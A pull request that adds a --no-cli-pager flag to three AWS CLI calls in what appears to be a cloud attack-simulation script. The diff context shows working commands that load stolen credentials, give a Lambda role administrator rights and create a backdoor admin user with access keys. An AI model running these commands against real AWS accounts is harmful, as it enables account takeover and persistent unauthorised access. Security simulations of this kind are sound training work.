### PR TITLE
Add --no-cli-pager flag to blocking AWS cli commands. Fixes #17

### DIFF
--- a/scenarios/scenario_2/scenario_2.py
+++ b/scenarios/scenario_2/scenario_2.py
@@ -70,7 +70,7 @@ def scenario_2_execute():
     print("-"*30)   
 
     creds = "export $(grep -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN token.txt)"
-    subprocess.call(""+creds+" && aws sts get-caller-identity", shell=True)
+    subprocess.call(""+creds+" && aws sts get-caller-identity --no-cli-pager", shell=True)
     
     print(colored("PrivEsc possible through this credential, Escalating role privileges", color="red"))
     subprocess.call(""+creds+" && aws iam attach-role-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --role-name "+LAMBDA_ROLE_NAME+"", shell=True)
@@ -92,9 +92,9 @@ def scenario_2_execute():
     print(colored("Creating a Backdoor User which can be used by the attacker", color="red"))
     loading_animation()
     print("-"*30)
-    subprocess.call(""+creds+" && aws iam create-user --user-name devops", shell=True)
+    subprocess.call(""+creds+" && aws iam create-user --user-name devops --no-cli-pager", shell=True)
     subprocess.call(""+creds+" && aws iam attach-user-policy --user-name devops --policy-arn arn:aws:iam::aws:policy/AdministratorAccess", shell=True)
-    subprocess.call(""+creds+" && aws iam create-access-key --user-name devops", shell=True)
+    subprocess.call(""+creds+" && aws iam create-access-key --user-name devops --no-cli-pager", shell=True)
 
 
     #Backdoor Role


### PR DESCRIPTION
## Description

Added `--no-cli-pager` flag to 3 separate AWS cli commands in Scenario 2.

## Motivation and Context

Previously running Scenario 2 blocked full execution of the scenario, and required user interaction when these commands were run.

## How Has This Been Tested?

Re-ran Scenario 2.

## Types of changes

- Bug fix (non-breaking change which fixes an issue)

## Checklist

<!--- Go over all the following points, and put an `x` in all the boxes that apply. -->
<!--- If you're unsure about any of these, don't hesitate to ask. We're here to help! -->

- [ ] I have updated the documentation accordingly.
- [X] I have read the **CONTRIBUTING** document.
- [ ] I have added tests to cover my changes if appropriate.
- [ ] All new and existing tests passed.
